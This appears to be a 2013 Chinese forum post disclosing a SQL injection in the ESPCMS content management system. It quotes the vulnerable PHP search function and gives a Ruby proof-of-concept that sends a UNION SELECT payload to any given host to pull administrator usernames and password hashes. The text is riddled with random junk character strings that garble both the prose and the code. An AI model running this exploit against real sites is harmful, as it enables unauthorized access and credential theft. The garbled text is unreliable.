0×0 漏洞概述0×1 漏洞细节
; c4 ]5 Y. Z( W4 | y/ d* Y) E A/ F0×2 PoC
; x; A$ }: D6 S9 K' T
/ G3 @4 `" G. V. a, {: p" u) o& ^9 C" U: X% A9 K/ t& g) u; w, z
9 r& V/ d2 `( J' J# K* _+ l* U. I0×0 漏洞概述# l: Q( a# s7 W8 K8 V! _
" }: Y; d' d( `/ a+ w; n. [易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。
6 R. B) ^! g2 b) v- \! k其在处理传入的参数时考虑不严谨导致SQL注入发生' A' f/ g( o3 _+ D! E% h
* s" X$ ]1 w t7 f0 s: t% ?* L/ B! O1 K0 y! ^' M( `
0×1 漏洞细节
9 c) ~+ z4 d6 i# `. J/ y! _; n$ H! V% q( ~
变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query,整个过程无过滤导致了注入的发生。) m* s6 Y0 j8 y4 h/ T2 p: ?
正因为变量是从$_SERVER['QUERY_STRING']中去取的,所以正好避开了程序的过滤。
# g# C; G6 I. A0 c而注入的变量是数组的值,并非数组的key,所以也没过被过滤,综合起来形成了一个比较少见的SQL注入。
% n. ]# \! x0 |- i- A3 ^
i2 X& w3 t7 H在/interface/3gwap_search.php文件的in_result函数中:
: ]+ A" ~! m R% z; l
8 t! j, `+ u( }; Q
+ p0 G* B4 J. ?. Z, X) u& D# W
1 H9 j2 S; w" g function in_result() {9 J$ G7 h* [, P8 v, c& |
... ... ... ... ... ... ... ... ...
/ m$ u5 N3 e. M* [$ h: Q# }0 r3 Z. J7 u $urlcode = $_SERVER[ 'QUERY_STRING '];$ v- y0 D' _0 r' M
parse_str(html_entity_decode($urlcode), $output);3 ]7 c2 | J' C- T" O7 {6 n
7 n: w6 p6 T7 C2 g, c( f ... ... ... ... ... ... ... ... ...
5 ~; U3 L5 A4 h' r) e' t: s! {0 s* b if (is_array($output['attr' ]) && count($output['attr']) > 0) {
E5 v* |: K* o w* Y" C: v, Y# c, n" S3 `8 V6 n
$db_table = db_prefix . 'model_att';
! q( B7 h& S; Y' C! C4 Q
2 q0 K1 o2 [4 ?* v foreach ($output['attr' ] as $key => $value) {
, `9 A) j+ V/ U" ~- ~ if ($value) {
, h% \+ |- c& x
( W$ w7 D0 G% g( {( h $key = addslashes($key);& V& u0 y. Z2 U( }6 k
$key = $this-> fun->inputcodetrim($key);! R. C D" T( x' h+ v
$db_att_where = " WHERE isclass=1 AND attrname='$key'";8 Y$ q4 y- S. E! e' _& p, E) ^' n9 W
$countnum = $this->db_numrows($db_table, $db_att_where);# e6 H8 Z8 r" p$ n, y& U$ H
if ($countnum > 0) {% E+ ?: l. ^* g+ c( w! J" N( F
$db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;' s. X$ m! T& D7 p2 x& u
}7 Y, t' r( T, m, O: J- I
}1 ~1 _) F8 y, G9 \/ L' k6 |1 w
}
8 a0 V. E3 D+ r( H) b }" t e+ [0 U% c# C0 N* H
if (!empty ($keyword) && empty($keyname)) {
2 R+ a/ r' C8 ~$ N5 O- ] $keyname = 'title';
) k& ~! l5 f: _- X% q $db_where.= " AND a.title like '%$keyword%'" ;# @/ K3 `+ O+ K0 X) d' p4 {. d2 s
} elseif (!empty ($keyword) && !empty($keyname)) {
% ~1 N1 t' @0 i1 Q $db_where.= " AND $keyname like '% $keyword%'";
9 x" N# X% R" K# q, Q, h1 l$ ^ s }
. ] n1 E4 q; h2 X! t* B $pagemax = 15;
/ y% \9 \1 ]+ `+ T3 v4 w4 _( d2 |( r/ L! ]- Y
$pagesylte = 1;: e- t, u6 _2 W- u1 t
$ i5 c& H0 q6 K if ($countnum > 0) {
2 k8 k r5 t z& P) b0 ]8 ~8 y! B' T+ e! Z* z% B
$numpage = ceil($countnum / $pagemax);7 c, i& G' O% [3 j9 l# `. O
} else {
6 Y7 R: o2 f1 Y/ ^* Z $numpage = 1;" z2 b1 b E6 q6 G4 @
}* l+ Q9 x. B+ p- w1 ?; I( \/ P
$sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
3 z6 G9 G6 W' T; F. M4 a* H $this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);
8 c! F3 Z- Z& @" ]9 j& ?$sql = $this-> htmlpage->PageSQL('a.did' , 'down' ); $rs = $this->db->query($sql);
' g" f% b$ @) n1 V: q; R/ t4 N/ d5 z ... ... ... ... ... ... ... ... ...
5 G! F0 T* ]0 t5 w2 L# N }) i: V5 ^% x0 L7 Y
& a; o7 r" @/ s9 t$ i
1 `. T: R9 F. B" t0×2 PoC
! m6 H# `7 i( _ ^0 R2 I5 m. v' g6 C- S& a7 |) Y
5 A7 w# N9 J @( U# o
6 Z' ^' ]: L4 v4 r4 T, Crequire "net/http"9 G! A/ N& g+ z$ v) i. G
2 X6 R. [& R2 v2 X& ldef request(method, url)' C( D% N1 [/ Z/ T: ^8 B3 T
if method.eql?("get")
' ~+ q, d6 A) W5 E0 D, r uri = URI.parse(url)3 l/ V; u7 K% C5 Z$ h R
http = Net::HTTP.new(uri.host, uri.port). c# Z" c0 s) A, v6 L/ i
response = http.request(Net::HTTP::Get.new(uri.request_uri))
3 S0 D; d2 \0 i& ]/ @ return response
& Z) k0 w9 p0 F. X. ]. H0 x end M1 I4 o- K% v$ [0 {! u
end. w' G' v" A* ^# g
3 x. G) e `1 ? ]3 qdoc =<<HERE
) O5 l* C% }8 v" G! N/ r, @- s7 e-------------------------------------------------------% s, `* k$ o) D1 _/ _: L1 |/ L
Espcms Injection Exploit
' S& Y" z( e: [, ~Author:ztz
7 Q8 [! b% F+ }5 H$ I' rBlog:http://ztz.fuzzexp.org/
- b& G: Z9 {/ u% K# ]1 I3 b, b, m-------------------------------------------------------% g9 a9 \: }& W. b% q: V5 ]
$ A0 j: ]+ u m* {
HERE
$ `. n6 t: |4 o. c" B h. r" M6 z. w; A( x
( p- ^( G; B7 Qusage =<<HERE
/ K0 u9 c# y# Q1 X5 r8 hUsage: ruby #{$0} host port path
* u: r' n; s& M( ?example: ruby #{$0} www.target.com 80 /+ z+ o3 L( P ?7 e: ^% S% s! {) Q s
HERE$ ]' f! P; R0 ]% c5 p( H: H! O
# x/ Q. A. e8 _1 Rputs doc
2 p$ u# ^' @! y( _/ Iif ARGV.length < 3 w5 Z( N1 Z) X+ x' b
puts usage
& e, e* ]( U: p) J( Delse
6 D: s5 h* N$ R) { $host = ARGV[0]
/ C; J! K6 U( a7 q5 { T $port = ARGV[1]
0 a3 g/ R( Z# \0 [1 @ $path = ARGV[2]+ }: s) |- [4 _: s; |; i2 T
6 w" m2 p! k- }, m' \ puts "send request..."
) X+ ]1 }! n' L6 b0 C Q' ] url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&3 h: I2 x% q R. R+ v
attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
0 ^* q' [* ]' J7 P' x1 L* L,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27
: R, k x6 ]% S! `5 M) y* n,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
2 ?* g) l$ Z: ?% U4 O% m8 ?5 l) J% w( h response = request("get", url)
; j6 l' C5 B4 E H0 N result = response.body.scan(/\w+&\w{32}/)/ j6 i1 Z1 O# q5 K$ _' a% i9 E
puts result6 F# j7 }" w6 ?! b, X- R# ^, s8 Z
end% k6 J Q, B8 ^0 L. R H, r
6 C% ]% u, C* j+ c
|
发表于 2013-7-27 18:31:52
收藏
支持
反对